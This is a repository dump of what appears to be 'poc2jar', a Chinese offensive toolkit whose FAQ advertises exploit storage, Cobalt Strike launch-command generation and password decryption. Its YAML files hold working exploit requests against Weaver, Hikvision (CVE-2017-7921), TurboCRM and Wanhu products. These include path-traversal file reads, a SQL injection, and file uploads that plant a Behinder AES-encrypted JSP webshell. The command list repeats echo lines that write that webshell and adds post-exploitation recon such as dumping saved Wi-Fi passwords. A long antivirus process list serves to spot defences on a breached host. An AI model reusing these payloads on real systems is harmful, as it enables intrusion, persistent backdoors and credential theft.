├── FAQ.md ├── README.md ├── poc ├── fanwei │ ├── WorkflowServiceXml.yml │ ├── fileread1.yml │ ├── fileread2.yml │ └── sqlinject1.yml ├── hikvision │ └── CVE-2017-7921.yml ├── turbocrm │ ├── fileread.yml │ └── getshell.yml └── wanhu │ └── frontgetshell.yml ├── property ├── cmdlists.txt ├── config.properties ├── exetest.txt └── test.txt ├── pythonexp ├── Tomcat │ ├── CNVD-2020-10487-Tomcat-Ajp-lfi.py │ └── CNVD-2020-10487-pro.py ├── poc2jarpiliang.py └── url.txt └── src └── main ├── Main.java ├── Poc2ExpguiController.java ├── ProxyController.java ├── RequestPoc ├── Poclist.java ├── Readfile.java ├── makeRequest.java ├── test.java ├── test3.java ├── test4.java ├── test6test.java └── test7.java ├── finalshelltest ├── Oracledecode.java ├── druid1016after.java ├── druidOutputpassword.java ├── finalshellDecode.java └── seeyonGetpass.java ├── javafxtest └── ListViewTest.java ├── resources ├── config.properties ├── poc2expgui.fxml └── proxy.fxml ├── support ├── ClassDataDesc.java ├── ClassDetails.java ├── ClassField.java ├── Expdecode.java ├── GCMDecode.java └── SerializationDumper.java ├── todo.txt └── util ├── AESDESende.java ├── AEStest.java ├── AEStest2.java ├── CorsJsonp.java ├── StageManager.java ├── Stringtest.java ├── Tasklist.java ├── Usualcmd.java ├── druidgetinformation.java ├── encodeUtil.java ├── extractPath.java ├── fileEncode.java ├── pythonexp.java └── test.java /FAQ.md: -------------------------------------------------------------------------------- 1 | # 1.如何使用? 2 | ### 使用`jdk8u231`及以下jdk版本启动`java -jar poc2jar.jar`,或者当默认jdk为8的时候双击jar即可进行使用 3 | 4 | # 2.有哪些功能? 5 | - 0x01.保存poc、exp利用(批量) 6 | - 0x02.tasklist进程搜索 7 | - 0x03.常用命令备忘 8 | - 0x04.python脚本利用 *`pocsuite调用`* 9 | - 0x05.Finalshell密码解密、seeyon(致远OA)数据库密码解密、druid密码解密 10 | - 0x06.编码(支持Unicode、URL、base64、Hex(十六进制)、Html、ascii) 11 | - 0x07.Bash、Powershell、Python、Perl命令编码 12 | - 0x08.CS上线命令生成 13 | - 0x09.Druid未授权漏洞利用、跨域漏洞利用(生成POC) 14 | - 0x10.Shiro rememberMe参数解密 15 | - 0x11 加解密模块,支持`AES/DES/DESede`模块 16 | - 0x12 提取路径模块(常用于web.xml的提取、Java Spring未授权的提取) 17 | - 0x13 文件转码 18 | - 0x14 文件写入命令 19 | 20 | 21 | # 3.无法找到主类错误: 找不到或无法加载主类 main.Main 原因: java.lang.NoClassDefFoundError: javafx/application/Application 22 | ### 使用JDK8启动即可 23 | -------------------------------------------------------------------------------- /poc/fanwei/fileread1.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /weaver/org.springframework.web.servlet.ResourceServlet 5 | param: resource=/WEB-INF/prop/weaver.properties 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 11 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 12 | Accept-Encoding: gzip, deflate 13 | Connection: keep-alive 14 | Upgrade-Insecure-Requests: 1 15 | condition: 16 | words: ecology.url 17 | time: 18 | expinformation: 19 | expname: 泛微读取文件-1 20 | expdescribe: 泛微读取文件,/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties -------------------------------------------------------------------------------- /poc/fanwei/fileread2.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /weaver/ln.FileDownload 5 | param: fpath=../ecology/WEB-INF/prop/weaver.properties 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 11 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 12 | Accept-Encoding: gzip, deflate 13 | Connection: keep-alive 14 | Upgrade-Insecure-Requests: 1 15 | condition: 16 | words: ecology.url 17 | time: 18 | expinformation: 19 | expname: 泛微读取文件-2 20 | expdescribe: 泛微读取文件,/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties -------------------------------------------------------------------------------- /poc/fanwei/sqlinject1.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /js/hrm/getdata.jsp 5 | param: cmd=forgotPasswordCheck&type=1&loginid=sysadmin111111%27%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0aunion+select+ascii(1),%272%27,%273%27,%274%27,%275%27,%276%27+where+%27%27=%27 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 11 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 12 | Accept-Encoding: gzip, deflate 13 | Connection: keep-alive 14 | Upgrade-Insecure-Requests: 1 15 | condition: 16 | words: > 17 | "id":49 18 | time: 19 | expinformation: 20 | expname: 泛微注入-2 21 | expdescribe: 泛微注入,/js/hrm/getdata.jsp -------------------------------------------------------------------------------- /poc/hikvision/CVE-2017-7921.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /onvif-http/snapshot 5 | param: auth=YWRtaW46MTEK 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 11 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 12 | Accept-Encoding: gzip, deflate 13 | Connection: keep-alive 14 | Upgrade-Insecure-Requests: 1 15 | condition: 16 | words: Content-Type:image/jpeg 17 | time: 18 | expinformation: 19 | expname: hikvision 20 | expdescribe: hikvision/CVE-2017-7921.yml,返回的为查看的图像(访问该链接可以直接查看海康威视的监控截图/onvif-http/snapshot?auth=YWRtaW46MTEK;访问该链接可以直接查看海康威视的用户列表/Security/users?auth=YWRtaW46MTEK;访问该链接可以直接获取海康威视的配置文件/System/configurationFile?auth=YWRtaW46MTEK) -------------------------------------------------------------------------------- /poc/turbocrm/fileread.yml: -------------------------------------------------------------------------------- 1 | method: GET 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /ajax/getemaildata.php 5 | param: DontCheckLogin=1&filePath=c:/windows/system32/drivers/etc/hosts 6 | data: | 7 | 8 | others: 9 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 10 | Accept: text/html,application/xhtml+xml,application/xml;q 11 | Accept-Language: zh-CN,zh;q 12 | Accept-Encoding: gzip, deflate 13 | Upgrade-Insecure-Requests: 1 14 | condition: 15 | words: Copyright 16 | time: 17 | expinformation: 18 | expname: TurboCRM文件读取 19 | expdescribe: TurboCRM文件读取,路径为/ajax/getemaildata.php -------------------------------------------------------------------------------- /poc/turbocrm/getshell.yml: -------------------------------------------------------------------------------- 1 | method: POST 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /ajax/getemaildata.php 5 | param: DontCheckLogin=1 6 | data: | 7 | -----------------------------344329421119612311021814993770 8 | Content-Disposition: form-data; name="file"; filename="shell.php " 9 | Content-Type: text/php 10 | 11 | 14 | 15 | -----------------------------344329421119612311021814993770 16 | Content-Disposition: form-data; name="upload" 17 | 18 | upload 19 | -----------------------------344329421119612311021814993770-- 20 | others: 21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 22 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' 23 | Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' 24 | Accept-Encoding: gzip, deflate 25 | Content-Type: 'multipart/form-data; boundary=---------------------------344329421119612311021814993770' 26 | Content-Length: 386 27 | Connection: keep-alive 28 | Cookie: 'PHPSESSID=c7vlvgf1hhc8uat6r2nnu57333' 29 | Upgrade-Insecure-Requests: 1 30 | condition: 31 | words: tmpfile 32 | time: 33 | expinformation: 34 | expname: TurboCRM任意文件上传 35 | expdescribe: TurboCRM任意文件上传,路径为返回的tmpfile/mh70D7.tmp.mht换为tmpfile/upd70D6.tmp.php -------------------------------------------------------------------------------- /poc/wanhu/frontgetshell.yml: -------------------------------------------------------------------------------- 1 | method: POST 2 | url: $ 3 | tlsversion: HTTP/1.1 4 | uri: /defaultroot/officeserverservlet 5 | param: 6 | data: | 7 | DBSTEP V3.0 185 0 611 8 | DBSTEP=REJTVEVQ 9 | OPTION=U0FWRUZJTEU= 10 | RECORDID= 11 | firstFilesize=dHJ1ZQ== 12 | isDoc=dHJ1ZQ== 13 | moduleType=aW5mb3JtYXRpb24= 14 | FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3RhMi5qc3A= 15 | isViewOld=MQ== 16 | 17 | <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> 18 | <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%> 19 | <%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k); 20 | Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES")); 21 | new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> 22 | others: 23 | User-Agent: Go-http-client/1.1 24 | Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3' 25 | Accept-Encoding: gzip, deflate 26 | Accept-Language: 'zh-CN,zh;q=0.9,en;q=0.8' 27 | Connection: close 28 | Upgrade-Insecure-Requests: 1 29 | Content-Length: 790 30 | condition: 31 | words: DBSTEP 32 | time: 33 | expinformation: 34 | expname: 万户getshell 35 | expdescribe: 万户getshell,可能需要代理模式下进行使用,默认冰蝎马,密码为rebeyond -------------------------------------------------------------------------------- /property/cmdlists.txt: -------------------------------------------------------------------------------- 1 | windows查找文件::::dir c:\ /s /b | find "win.ini"、dir c:\ /s /b | find "navicat.exe"、dir c:\ /s /b | find "finalshell.exe" 2 | 3 | linux查找文件::::find / -name passwd 4 | 5 | windows写文件::::echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^> >> C:/x/x.jsp、、echo ^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^> >> C:/x/x.jsp、、echo ^<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> >> C:/x/x.jsp 6 | 7 | linux写文件::::echo xxxxx== |base64 -d > /var/www/html/1.jsp 8 | 9 | 获取操作系统命令::::wmic OS get Caption,CSDVersion,OSArchitecture,Version 10 | 11 | 主机收集::::查看rdp链接记录 cmdkey /list、查看dns记录 ipconfig /displaydns 、查看arp记录 arp -a 12 | 13 | 根据进程查找进程文件::::wmic process where name="xxxx.exe" get processid,executablepath,name、wmic process where name="chrome.exe" list full 14 | 15 | 查看当前系统是否有屏保保护,延迟是多少::::wmic desktop get screensaversecure,screensavertimeout 16 | 17 | 查看当前系统是否是VMWARE::::wmic bios list full | find /i "vmware" 18 | 19 | 显示系统中的曾经连接过的无线密码::::netsh wlan show profiles 20 | 21 | windows常用的系统变量::::查看当前用户目录%HOMEPATH、查看当前目录%CD%、列出用户共享主目录的网络路径%HOMESHARE%、 列出有效的当前登录会话的域名控制器名、列出了可执行文件的搜索路径%Path%、列出了处理器的芯片架构%PROCESSOR_ARCHITECTURE%、列出了Program Files文件夹的路径%ProgramFiles%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了包含用户帐号的域的名字%USERDOMAIN%、列出操作系统目录的位置%WINDIR%、返回“所有用户”配置文件的位置%ALLUSERSPROFILE%、返回处理器数目%NUMBER_OF_PROCESSORS% 22 | -------------------------------------------------------------------------------- /property/config.properties: -------------------------------------------------------------------------------- 1 | python2path=python 2 | python3path=python3 3 | -------------------------------------------------------------------------------- /property/exetest.txt: -------------------------------------------------------------------------------- 1 | "360tray.exe": "360安全卫士-实时保护", 2 | "360safe.exe": "360安全卫士-主程序", 3 | "ZhuDongFangYu.exe": "360安全卫士-主动防御", 4 | "360sd.exe": "360杀毒", 5 | "a2guard.exe": "a-squared杀毒", 6 | "ad-watch.exe": "Lavasoft杀毒", 7 | "cleaner8.exe": "The Cleaner杀毒", 8 | "vba32lder.exe": "vb32杀毒", 9 | "MongoosaGUI.exe": "Mongoosa杀毒", 10 | "CorantiControlCenter32.exe": "Coranti2012杀毒", 11 | "F-PROT.exe": "F-Prot AntiVirus", 12 | "CMCTrayIcon.exe": "CMC杀毒", 13 | "K7TSecurity.exe": "K7杀毒", 14 | "UnThreat.exe": "UnThreat杀毒", 15 | "CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒", 16 | "AVWatchService.exe": "VIRUSfighter杀毒", 17 | "ArcaTasksService.exe": "ArcaVir杀毒", 18 | "iptray.exe": "Immunet杀毒", 19 | "PSafeSysTray.exe": "PSafe杀毒", 20 | "nspupsvc.exe": "nProtect杀毒", 21 | "SpywareTerminatorShield.exe": "SpywareTerminator反间谍软件", 22 | "BKavService.exe": "Bkav杀毒", 23 | "MsMpEng.exe": "Microsoft Security Essentials", 24 | "SBAMSvc.exe": "VIPRE", 25 | "ccSvcHst.exe": "Norton杀毒", 26 | "f-secure.exe": "冰岛", 27 | "avp.exe": "Kaspersky", 28 | "KvMonXP.exe": "江民杀毒", 29 | "RavMonD.exe": "瑞星杀毒", 30 | "Mcshield.exe": "McAfee", 31 | "Tbmon.exe": "McAfee", 32 | "Frameworkservice.exe": "McAfee", 33 | "egui.exe": "ESET NOD32", 34 | "ekrn.exe": "ESET NOD32", 35 | "eguiProxy.exe": "ESET NOD32", 36 | "kxetray.exe": "金山毒霸", 37 | "knsdtray.exe": "可牛杀毒", 38 | "TMBMSRV.exe": "趋势杀毒", 39 | "avcenter.exe": "Avira(小红伞)", 40 | "avguard.exe": "Avira(小红伞)", 41 | "avgnt.exe": "Avira(小红伞)", 42 | "sched.exe": "Avira(小红伞)", 43 | "ashDisp.exe": "Avast网络安全", 44 | "rtvscan.exe": "诺顿杀毒", 45 | "ccapp.exe": "SymantecNorton", 46 | "NPFMntor.exe": "Norton杀毒软件", 47 | "ccSetMgr.exe": "赛门铁克", 48 | "ccRegVfy.exe": "Norton杀毒软件", 49 | "ksafe.exe": "金山卫士", 50 | "QQPCRTP.exe": "QQ电脑管家", 51 | "avgwdsvc.exe": "AVG杀毒", 52 | "QUHLPSVC.exe": "QUICK HEAL杀毒", 53 | "mssecess.exe": "微软杀毒", 54 | "SavProgress.exe": "Sophos杀毒", 55 | "SophosUI.exe": "Sophos杀毒", 56 | "SophosFS.exe": "Sophos杀毒", 57 | "SophosHealth.exe": "Sophos杀毒", 58 | "SophosSafestore64.exe": "Sophos杀毒", 59 | "SophosCleanM.exe": "Sophos杀毒", 60 | "fsavgui.exe": "F-Secure杀毒", 61 | "vsserv.exe": "比特梵德", 62 | "remupd.exe": "熊猫卫士", 63 | "FortiTray.exe": "飞塔", 64 | "safedog.exe": "安全狗", 65 | "parmor.exe": "木马克星", 66 | "Iparmor.exe.exe": "木马克星", 67 | "beikesan.exe": "贝壳云安全", 68 | "KSWebShield.exe": "金山网盾", 69 | "TrojanHunter.exe": "木马猎手", 70 | "GG.exe": "巨盾网游安全盾", 71 | "adam.exe": "绿鹰安全精灵", 72 | "AST.exe": "超级巡警", 73 | "ananwidget.exe": "墨者安全专家", 74 | "AVK.exe": "AntiVirusKit", 75 | "avg.exe": "AVG Anti-Virus", 76 | "spidernt.exe": "Dr.web", 77 | "avgaurd.exe": "Avira Antivir", 78 | "vsmon.exe": "Zone Alarm", 79 | "cpf.exe": "Comodo", 80 | "outpost.exe": "Outpost Firewall", 81 | "rfwmain.exe": "瑞星防火墙", 82 | "kpfwtray.exe": "金山网镖", 83 | "FYFireWall.exe": "风云防火墙", 84 | "MPMon.exe": "微点主动防御", 85 | "pfw.exe": "天网防火墙", 86 | "BaiduSdSvc.exe": "百度杀毒-服务进程", 87 | "BaiduSdTray.exe": "百度杀毒-托盘进程", 88 | "BaiduSd.exe": "百度杀毒-主程序", 89 | "SafeDogGuardCenter.exe": "安全狗", 90 | "safedogupdatecenter.exe": "安全狗", 91 | "safedogguardcenter.exe": "安全狗", 92 | "SafeDogSiteIIS.exe": "安全狗", 93 | "SafeDogTray.exe": "安全狗", 94 | "SafeDogServerUI.exe": "安全狗", 95 | "D_Safe_Manage.exe": "D盾", 96 | "d_manage.exe": "D盾", 97 | "yunsuo_agent_service.exe": "云锁", 98 | "yunsuo_agent_daemon.exe": "云锁", 99 | "HwsPanel.exe": "护卫神", 100 | "hws_ui.exe": "护卫神", 101 | "hws.exe": "护卫神", 102 | "hwsd.exe": "护卫神", 103 | "hipstray.exe": "火绒", 104 | "wsctrl.exe": "火绒", 105 | "usysdiag.exe": "火绒", 106 | "SPHINX.exe": "SPHINX防火墙", 107 | "bddownloader.exe": "百度卫士", 108 | "baiduansvx.exe": "百度卫士-主进程", 109 | "AvastUI.exe": "Avast!5主程序", 110 | "emet_agent.exe": "EMET", 111 | "emet_service.exe": "EMET", 112 | "firesvc.exe": "McAfee", 113 | "firetray.exe": "McAfee", 114 | "hipsvc.exe": "McAfee", 115 | "mfevtps.exe": "McAfee", 116 | "mcafeefire.exe": "McAfee", 117 | "scan32.exe": "McAfee", 118 | "shstat.exe": "McAfee", 119 | "vstskmgr.exe": "McAfee", 120 | "engineserver.exe": "McAfee", 121 | "mfeann.exe": "McAfee", 122 | "mcscript.exe": "McAfee", 123 | "updaterui.exe": "McAfee", 124 | "udaterui.exe": "McAfee", 125 | "naprdmgr.exe": "McAfee", 126 | "cleanup.exe": "McAfee", 127 | "cmdagent.exe": "McAfee", 128 | "frminst.exe": "McAfee", 129 | "mcscript_inuse.exe": "McAfee", 130 | "mctray.exe": "McAfee", 131 | "_avp32.exe": "卡巴斯基", 132 | "_avpcc.exe": "卡巴斯基", 133 | "_avpm.exe": "卡巴斯基", 134 | "aAvgApi.exe": "AVG", 135 | "ackwin32.exe": "已知杀软进程,名称暂未收录", 136 | "alertsvc.exe": "Norton AntiVirus", 137 | "alogserv.exe": "McAfee VirusScan", 138 | "anti-trojan.exe": "Anti-Trojan Elite", 139 | "arr.exe": "Application Request Route", 140 | "atguard.exe": "AntiVir", 141 | "atupdater.exe": "已知杀软进程,名称暂未收录", 142 | "atwatch.exe": "Mustek", 143 | "au.exe": "NSIS", 144 | "aupdate.exe": "Symantec", 145 | "auto-protect.nav80try.exe": "已知杀软进程,名称暂未收录", 146 | "autodown.exe": "AntiVirus AutoUpdater", 147 | "avconsol.exe": "McAfee", 148 | "avgcc32.exe": "AVG", 149 | "avgctrl.exe": "AVG", 150 | "avgemc.exe": "AVG", 151 | "avgrsx.exe": "AVG", 152 | "avgserv.exe": "AVG", 153 | "avgserv9.exe": "AVG", 154 | "avgw.exe": "AVG", 155 | "avkpop.exe": "G DATA SOFTWARE AG", 156 | "avkserv.exe": "G DATA SOFTWARE AG", 157 | "avkservice.exe": "G DATA SOFTWARE AG", 158 | "avkwctl9.exe": "G DATA SOFTWARE AG", 159 | "avltmain.exe": "Panda Software Aplication", 160 | "avnt.exe": "H+BEDV Datentechnik GmbH", 161 | "avp32.exe": "Kaspersky Anti-Virus", 162 | "avpcc.exe": " Kaspersky AntiVirus", 163 | "avpdos32.exe": " Kaspersky AntiVirus", 164 | "avpm.exe": " Kaspersky AntiVirus", 165 | "avptc32.exe": " Kaspersky AntiVirus", 166 | "avpupd.exe": " Kaspersky AntiVirus", 167 | "avsynmgr.exe": "McAfee", 168 | "avwin.exe": " H+BEDV", 169 | "bargains.exe": "Exact Advertising SpyWare", 170 | "beagle.exe": "Avast", 171 | "blackd.exe": "BlackICE", 172 | "blackice.exe": "BlackICE", 173 | "blink.exe": "micromedia", 174 | "blss.exe": "CBlaster", 175 | "bootwarn.exe": "Symantec", 176 | "bpc.exe": "Grokster", 177 | "brasil.exe": "Exact Advertising", 178 | "ccevtmgr.exe": "Norton Internet Security", 179 | "cdp.exe": "CyberLink Corp.", 180 | "cfd.exe": "Motive Communications", 181 | "cfgwiz.exe": " Norton AntiVirus", 182 | "claw95.exe": "已知杀软进程,名称暂未收录", 183 | "claw95cf.exe": "已知杀软进程,名称暂未收录", 184 | "clean.exe": "windows流氓软件清理大师", 185 | "cleaner.exe": "windows流氓软件清理大师", 186 | "cleaner3.exe": "windows流氓软件清理大师", 187 | "cleanpc.exe": "windows流氓软件清理大师", 188 | "cpd.exe": "McAfee", 189 | "ctrl.exe": "已知杀软进程,名称暂未收录", 190 | "cv.exe": "已知杀软进程,名称暂未收录", 191 | "defalert.exe": "Symantec", 192 | "defscangui.exe": "Symantec", 193 | "defwatch.exe": "Norton Antivirus", 194 | "doors.exe": "已知杀软进程,名称暂未收录", 195 | "dpf.exe": "已知杀软进程,名称暂未收录", 196 | "dpps2.exe": "PanicWare", 197 | "dssagent.exe": "Broderbund", 198 | "ecengine.exe": "已知杀软进程,名称暂未收录", 199 | "emsw.exe": "Alset Inc", 200 | "ent.exe": "已知杀软进程,名称暂未收录", 201 | "espwatch.exe": "已知杀软进程,名称暂未收录", 202 | "ethereal.exe": "RationalClearCase", 203 | "exe.avxw.exe": "已知杀软进程,名称暂未收录", 204 | "expert.exe": "已知杀软进程,名称暂未收录", 205 | "f-prot95.exe": "已知杀软进程,名称暂未收录", 206 | "fameh32.exe": "F-Secure", 207 | "fast.exe": " FastUsr", 208 | "fch32.exe": "F-Secure", 209 | "fih32.exe": "F-Secure", 210 | "findviru.exe": "F-Secure", 211 | "firewall.exe": "AshampooSoftware", 212 | "fnrb32.exe": "F-Secure", 213 | "fp-win.exe": " F-Prot Antivirus OnDemand", 214 | "fsaa.exe": "F-Secure", 215 | "fsav.exe": "F-Secure", 216 | "fsav32.exe": "F-Secure", 217 | "fsav530stbyb.exe": "F-Secure", 218 | "fsav530wtbyb.exe": "F-Secure", 219 | "fsav95.exe": "F-Secure", 220 | "fsgk32.exe": "F-Secure", 221 | "fsm32.exe": "F-Secure", 222 | "fsma32.exe": "F-Secure", 223 | "fsmb32.exe": "F-Secure", 224 | "gbmenu.exe": "已知杀软进程,名称暂未收录", 225 | "guard.exe": "ewido", 226 | "guarddog.exe": "ewido", 227 | "htlog.exe": "已知杀软进程,名称暂未收录", 228 | "htpatch.exe": "Silicon Integrated Systems Corporation", 229 | "hwpe.exe": "已知杀软进程,名称暂未收录", 230 | "iamapp.exe": "Symantec", 231 | "iamserv.exe": "Symantec", 232 | "iamstats.exe": "Symantec", 233 | "iedriver.exe": " Urlblaze.com", 234 | "iface.exe": "Panda Antivirus Module", 235 | "infus.exe": "Infus Dialer", 236 | "infwin.exe": "Msviewparasite", 237 | "intdel.exe": "Inet Delivery", 238 | "intren.exe": "已知杀软进程,名称暂未收录", 239 | "jammer.exe": "已知杀软进程,名称暂未收录", 240 | "kavpf.exe": "Kapersky", 241 | "kazza.exe": "Kapersky", 242 | "keenvalue.exe": "EUNIVERSE INC", 243 | "launcher.exe": "Intercort Systems", 244 | "ldpro.exe": "已知杀软进程,名称暂未收录", 245 | "ldscan.exe": "Windows Trojans Inspector", 246 | "localnet.exe": "已知杀软进程,名称暂未收录", 247 | "luall.exe": "Symantec", 248 | "luau.exe": "Symantec", 249 | "lucomserver.exe": "Norton", 250 | "mcagent.exe": "McAfee", 251 | "mcmnhdlr.exe": "McAfee", 252 | "mctool.exe": "McAfee", 253 | "mcupdate.exe": "McAfee", 254 | "mcvsrte.exe": "McAfee", 255 | "mcvsshld.exe": "McAfee", 256 | "mfin32.exe": "MyFreeInternetUpdate", 257 | "mfw2en.exe": "MyFreeInternetUpdate", 258 | "mfweng3.02d30.exe": "MyFreeInternetUpdate", 259 | "mgavrtcl.exe": "McAfee", 260 | "mgavrte.exe": "McAfee", 261 | "mghtml.exe": "McAfee", 262 | "mgui.exe": "BullGuard", 263 | "minilog.exe": "Zone Labs Inc", 264 | "mmod.exe": "EzulaInc", 265 | "mostat.exe": "WurldMediaInc", 266 | "mpfagent.exe": "McAfee", 267 | "mpfservice.exe": "McAfee", 268 | "mpftray.exe": "McAfee", 269 | "mscache.exe": "Integrated Search Technologies Spyware", 270 | "mscman.exe": "OdysseusMarketingInc", 271 | "msmgt.exe": "Total Velocity Spyware", 272 | "msvxd.exe": "W32/Datom-A", 273 | "mwatch.exe": "已知杀软进程,名称暂未收录", 274 | "nav.exe": "Reuters Limited", 275 | "navapsvc.exe": "Norton AntiVirus", 276 | "navapw32.exe": "Norton AntiVirus", 277 | "navw32.exe": "Norton Antivirus", 278 | "ndd32.exe": "诺顿磁盘医生", 279 | "neowatchlog.exe": "已知杀软进程,名称暂未收录", 280 | "netutils.exe": "已知杀软进程,名称暂未收录", 281 | "nisserv.exe": "Norton", 